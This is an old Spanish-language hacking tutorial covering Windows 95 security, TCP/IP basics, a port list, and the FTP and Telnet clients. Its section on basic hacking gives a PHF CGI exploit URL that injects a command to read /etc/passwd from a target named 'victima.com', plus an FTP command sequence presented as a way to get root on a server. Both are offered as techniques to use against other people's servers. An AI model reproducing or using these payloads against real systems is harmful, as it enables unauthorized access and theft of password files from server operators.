Super Guia del Hacker 2

2. Descripcion General De Windows.

Como todos sabemos el windows95 es un popular sistema operativo de la casa
Microsoft, el cual es conocido tanto por sus adepto ya que es muy sencillo
y vistoso pero al igual tambien es muy conocido por su inseguridad en casi
todos sus aspectos, ademas no ofrece tanta versativilidad como otros
sistemas operativos. Por ejemplo este es el caso de su "Multitarea" la cual
es virtual y no real, si quieres hacer la prueba pon en marcha el defrag y
ejecuta otro programa :) y veras esa famosa Multitarea.

El win95 es un sistema operativo de 32 bits multitarea, que es muy comodo
para la gente que busca facilidad, pero no te enga¤es pensando que es un
sistema ideal para Internet, puede que para un usuario convencional le sea
estupendo pero para un Hacker se queda muy corto de calle, ya que le falta
muchos servicios que otros sistemas operativos si traen como el que ya
tantas veces he repetido, el Unix (se nota que me encanta??:).

Aqui os dejo de dar la murga sobre win95 ya que este texto no esta destinado
a hablar sobre este sistema sino a usarlo para hackear. Ademas no creo que
este contando nada nuevo sobre windows o sea que mejor me callo y si no
sabes mucho sobre win95, pues ya sabes comprate un libro.

2a. Seguridad En Windows.

Como todos sabemos la seguridad en win95 es nula, es decir, win95 no tiene
seguridad por si mismo, un claro ejemplo de esto que es las ventanas que
nos piden un password las podemos cerrar pulsando sobre la X o tambien
nos basta con pulsar ctrl+atl+supr, con lo que nos salteremo esta ventana
sin meter ningun password.

Por eso para que nuestro ventanas (nombre que se le da a win95:) tendremos
que instalarle algun paquete de seguridad disponible por la red, que hay
muchos y buenos y lo mejor es que son Freeware (gratis) aunque siempre
puedes comprar algun paquete comercial de seguridad, en mi opinion alguna
veces una tonteria, ya que nos pueden cobrar un precio abusivo y cuando
llega la oportunidad de demostrar su calidad nos falla, ya que no hay nada
seguro 100%.

Proteger nuestro win95 es cosa de cada uno pero tranquilidad, que la cosa
no es muy dificil, es cuestion de estar atento a las novedades, en otras
palabras estar informado. Mas abajo ya te entereras de estas cosas.

3. Protocolo TCP/IP y Demas Historias.

El protocolo TCP/IP, es el mas usado y seguramente no lo sabias, ya que
engloba casi todos los servicios que solemos usar como por ejemplo cuando
hacemos telnet, mail, ftp o cualquier cosa.

TCP/IP proviene de Transmission Control Protocol y Internet Protocol
respectivamente. Por fortuna para los usuarios de win95, este protocolo
ya viene incorporado nativamente en el sistema, al contrario que ocurria
con el windows 3.x, el cual lo teniamos que instalar para poder conectar
a Internet.

Como has podido comprobar en realidad son 2 protocolos pero que estan
unidos, el primero o sea el TCP es el encargado de las comunicaciones y de
la transmision de los paquetes cuando estamos conectados a un servidor. El
IP es el encargado de que los paquetes llegen a destino por orden aunque
tomen caminos diferentes.

* Diagrama del TCP *

cliente -> El cliente le envia una -> servidor
solicitud de conexion
espeficicando el puerto
de conexion al servidor.

cliente <- El servidor le responde <- servidor
que conoce su peticion
de conexion.

cliente -> El cliente le devuelve <- servidor
otra vez la peticion y
el circuito ya esta
abierto.

* Diagrama del IP *

³Informacion general³Direccion IP³Direccion IP³Datos³
³de cabezera. ³de origen ³de destino. ³ ³

Pues aqui se acaba la explicacion basica de este protocolo, para el que
este interesado en profundizar le remito a que se pille el RFC 1180 o un
fichero disponible en multitud de servidores, desgraciadamente no te puede
asegurar el nombre del fichero ya que lo he encontrado de varias formas
pero te dare el nombre que aparece al editarlo, ya que en todos es igual:

Introduction
to
the Internet Protocols

C R

C S
Computer Science Facilities Group
C I

L S

RUTGERS
The State University of New Jersey

3 July 1987

3a. Puertos

Antes ya os he explicado muy brevemente la comunicacion del protocolo en
cuestion. Pues ahora os pongo una extensa lista sobre los distintos
puertos y sus servicios correspondientes.

echo 7/tcp
echo 7/udp
discard 9/tcp sink null
discard 9/udp sink null
systat 11/tcp
systat 11/tcp users
daytime 13/tcp
daytime 13/udp
netstat 15/tcp
qotd 17/tcp quote
qotd 17/udp quote
chargen 19/tcp ttytst source
chargen 19/udp ttytst source
ftp-data 20/tcp
ftp 21/tcp
telnet 23/tcp
smtp 25/tcp mail
time 37/tcp timserver
time 37/udp timserver
rlp 39/udp resource # resource location
name 42/tcp nameserver
name 42/udp nameserver
whois 43/tcp nicname # usually to sri-nic
domain 53/tcp nameserver # name-domain server
domain 53/udp nameserver
nameserver 53/tcp domain # name-domain server
nameserver 53/udp domain
mtp 57/tcp # deprecated
bootp 67/udp # boot program server
tftp 69/udp
rje 77/tcp netrjs
finger 79/tcp
link 87/tcp ttylink
supdup 95/tcp
hostnames 101/tcp hostname # usually from sri-nic
iso-tsap 102/tcp
dictionary 103/tcp webster
x400 103/tcp # ISO Mail
x400-snd 104/tcp
csnet-ns 105/tcp
pop 109/tcp postoffice
pop2 109/tcp # Post Office
pop3 110/tcp postoffice
portmap 111/tcp
portmap 111/udp
sunrpc 111/tcp
sunrpc 111/udp
auth 113/tcp authentication
sftp 115/tcp
path 117/tcp
uucp-path 117/tcp
nntp 119/tcp usenet # Network News Transfer
ntp 123/udp ntpd ntp # network time protocol (exp)
nbname 137/udp
nbdatagram 138/udp
nbsession 139/tcp
NeWS 144/tcp news
sgmp 153/udp sgmp
tcprepo 158/tcp repository # PCMAIL
snmp 161/udp snmp
snmp-trap 162/udp snmp
print-srv 170/tcp # network PostScript
vmnet 175/tcp
load 315/udp
vmnet0 400/tcp
sytek 500/udp
biff 512/udp comsat
exec 512/tcp
login 513/tcp
who 513/udp whod
shell 514/tcp cmd # no passwords used
syslog 514/udp
printer 515/tcp spooler # line printer spooler
talk 517/udp
ntalk 518/udp
efs 520/tcp # for LucasFilm
route 520/udp router routed
timed 525/udp timeserver
tempo 526/tcp newdate
courier 530/tcp rpc
conference 531/tcp chat
rvd-control 531/udp MIT disk
netnews 532/tcp readnews
netwall 533/udp # -for emergency broadcasts
uucp 540/tcp uucpd # uucp daemon
klogin 543/tcp # Kerberos authenticated rlogin
kshell 544/tcp cmd # and remote shell
new-rwho 550/udp new-who # experimental
remotefs 556/tcp rfs_server rfs# Brunhoff remote filesystem
rmonitor 560/udp rmonitord # experimental
monitor 561/udp # experimental
garcon 600/tcp
maitrd 601/tcp
busboy 602/tcp
acctmaster 700/udp
acctslave 701/udp
acct 702/udp
acctlogin 703/udp
acctprinter 704/udp
elcsd 704/udp # errlog
acctinfo 705/udp
acctslave2 706/udp
acctdisk 707/udp
kerberos 750/tcp kdc # Kerberos authentication--tcp
kerberos 750/udp kdc # Kerberos authentication--udp
kerberos_master 751/tcp # Kerberos authentication
kerberos_master 751/udp # Kerberos authentication
passwd_server 752/udp # Kerberos passwd server
userreg_server 753/udp # Kerberos userreg server
krb_prop 754/tcp # Kerberos slave propagation
erlogin 888/tcp # Login and environment passing
kpop 1109/tcp # Pop with Kerberos
phone 1167/udp
ingreslock 1524/tcp
maze 1666/udp
nfs 2049/udp # sun nfs
knetd 2053/tcp # Kerberos de-multiplexor
eklogin 2105/tcp # Kerberos encrypted rlogin
rmt 5555/tcp rmtd
mtb 5556/tcp mtbd # mtb backup
man 9535/tcp # remote man server
w 9536/tcp
mantst 9537/tcp # remote man server, testing
bnews 10000/tcp
rscs0 10000/udp
queue 10001/tcp
rscs1 10001/udp
poker 10002/tcp
rscs2 10002/udp
gateway 10003/tcp
rscs3 10003/udp
remp 10004/tcp
rscs4 10004/udp
rscs5 10005/udp
rscs6 10006/udp
rscs7 10007/udp
rscs8 10008/udp
rscs9 10009/udp
rscsa 10010/udp
rscsb 10011/udp
qmaster 10012/tcp
qmaster 10012/udp

La verdad es que no te quejaras :) de esta lista. Si quieres mas
informacion sobre los puertos con su debida explicacion mirate el RFC 1060.

3b. Ftp.

Supongo que a estas alturas sabras lo que es el FTP, File Transfer Protocol
o sea Protocolo de Transferencia de Ficheros y como podras observar en el
listado de los puertos al FTP le corresponde el 21. Este servicio hay que
conocerlo muy bien ya que ademas que nos sirve para subir o bajar ficheros
tambien nos puede ayuda en nuestros propositos :), por supuesto el hacking.

Sino dispones de ningun cliente FTP, el propio win95 lleva incorporado uno,
el unico problema es que no es muy vistoso ya que funciona en modo MS-DOS
pero es muy versatil y perfecto para nosotros. Para ejecutarlo basta que
activemos una ventana MS-DOS y en la linea de comados escribamos FTP y se
pondra en modo FTP. Un ejemplo seria esto:

c:\>ftp <- Escribimos FTP.

ftp> <- activado el modo FTP.

Si no sabes manejarlo, escribiendo un "?" o "help" saldran todos los
comandos disponibles del FTP, como no viene a cuento no los explicare pero
buscando por hay podras hallar informacion de lo que hace cada cosa pero
lo mejor es que lo averigues tu solito.

3c. Telnet.

Por suerte los usuarios de win95 con el telnet tienen mas suerte o menos
segun se mire, ya que el servico de Telnet de win95 que tambien esta
incorporado en el sistema, es muy facil de manejar y ademas tiene ventana
propia. Por eso si ejecutamos telnet se abrira una ventana y lo unico que
tenemos que hacer es ir al menu en la opcion "conectar" y dentro de aqui
la de "sistema remoto", entonces se activara otra ventana en la que
nos saldra tres opciones, la primera "nombre de host" es donde queremos
conectar, "puerto" a que puerto conectamos, por defecto el 23 y por ultimo
tenemos "tipo de terminal" que no hace falta cambiarlo.

El telnet es importante ya que es asi como entramos a una cuenta en un
servidor y podremos hacer lo que tengamos permitido en el sistema.
Logicamente entraremos en una cuenta si tenemos el login y password.

4. Hacking Basico En Windows.

Por fin ya se a acabo el latazo de la explicacion de como moverse por
win95. Ahora ya podemos empezar a jugar un poco por inet :), siempre
por puro placer pero jamas con malos fines.

En esta seccion os explicare varias maneras de hacking usando el win95 a
pelo o sea sin utilizar ninguna herramienta externa.

4a. Phf.

La primera tecnica ya es muy conocida y la verdad es que tendremos suerte
si nos funciona pero todavia sigue vigente y doy fe de ello }:-) solo hay
que saber buscar y tener paciencia.

Para que esto nos funcione solo tenemos que tener un navegador instalado
en nuesto win95, por defecto suele venir el IE o sea que no podras decir
que no tienes, siempre y cuando hallas instalado los paquetes extras.

Lo que tenemos que hacer es ir con nuestro navegador a algun servidor que
corra sobre unix (muchos). Conectamos con un servidor en cuestion,
www.victima.com, ya estamos viendo su web, llegados aqui, a esa linea le
a¤adimos:

http://www.victima.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

Como ya he dicho si todo sale bien nos aparecera el fichero de passwords
del servidor con lo que solo nos queda grabarlo en nuestro HD. Por supuesto
el PHF tiene muchas variantes por eso te aconsejo que busce algo que
profundice en esta tecnica al igual que tambien busce informacion sobre
el fichero passwd de unix para comprenderlo.

4b. Ftp.

Antes ya te he explicado el funcionamiento del FTP de win95, ahora lo
usaremos para sacer el fichero de password de un servidor. Desde una
ventana del MS-DOS llamamos al programa FTP y escribimos:

ftp> open victima.com
Conect to victima.com
220 victim.com FTP server ready.

ftp> quote user ftp
331 Guest login ok, send ident as password.

ftp> quote cwd ~root
530 Please login with USER and PASS.

ftp> quote pass ftp
230 Guest login ok, access restrictions apply.

ftp> dir (o lo que querramos)

Y como siempre es el caso si todo sale bien estaremos metidos en el
sistema como root (en lenguaje unix significa el superusuario, o sea el
que controla el servidor). Por desgracia esta tecnica es muy antigua por
lo que mas seguro no funcionara pero todo es posible.

Quiero seguir leyendo